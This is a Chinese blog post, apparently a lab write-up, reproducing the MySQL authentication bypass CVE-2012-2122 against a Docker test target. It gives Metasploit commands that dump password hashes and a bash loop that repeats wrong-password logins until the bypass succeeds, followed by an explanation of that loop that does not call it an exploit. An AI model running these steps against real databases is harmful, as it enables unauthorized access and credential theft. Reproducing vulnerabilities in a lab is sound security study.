赞
踩
靶机:IP:192.168.100.40
- cd master/mysql/CVE-2012-2122
- docker-compose up -d
msfconsole
- use auxiliary/scanner/mysql/mysql_authbypass_hashdump
- set RHOSTS 192.168.100.40
- set THREADS 100
- run
cat /root/.msf4/loot/20240721224430_default_192.168.100.40_mysql.hashes_838828.txt
mysql -h 192.168.100.40 -u root -p
for i in `seq 1 1000`; do mysql -u root -P3306 -password=bad -h 192.168.100.40 2>/dev/null;done
这段代码的主要目的是尝试通过 MySQL 客户端连接到指定的数据库服务器,重定向错误输出以保持输出简洁。
解释:
for i in
`seq 1 1000`; do … done:
for
循环,它将会重复执行循环体内的命令。seq 1 1000
生成从 1 到 1000 的数字序列,for i in \
seq 1 1000` 将这些数字赋值给变量
i`。mysql -u root -P3306 -password=bad -h 192.168.100.40
:
mysql
是 MySQL 客户端程序。-u root
指定使用用户名 root
连接数据库。-P3306
指定 MySQL 服务器的端口号为 3306。-password=bad
指定连接密码为 bad
。注意,这种指定密码的方式不是安全的实践,因为密码在命令行参数中可能会被轻松地拦截。-h 192.168.100.40
指定连接的 MySQL 服务器的主机地址为 192.168.100.40
。2>/dev/null
:
/dev/null
,即丢弃错误信息。执行流程:
for i in \
seq 1 1000`; do … done 循环将执行
mysql` 命令。/dev/null
,因此不会显示错误信息,循环继续执行下一个尝试。注意事项:
.my.cnf
文件或者环境变量。作 者:PeiyuJue
链 接: Mysql 身份认证绕过漏洞(CVE-2012-2122)复现 – Candid Chronicles
来 源:Aaron的博客
版 权 声 明:本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有,未经允许请勿转载!
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。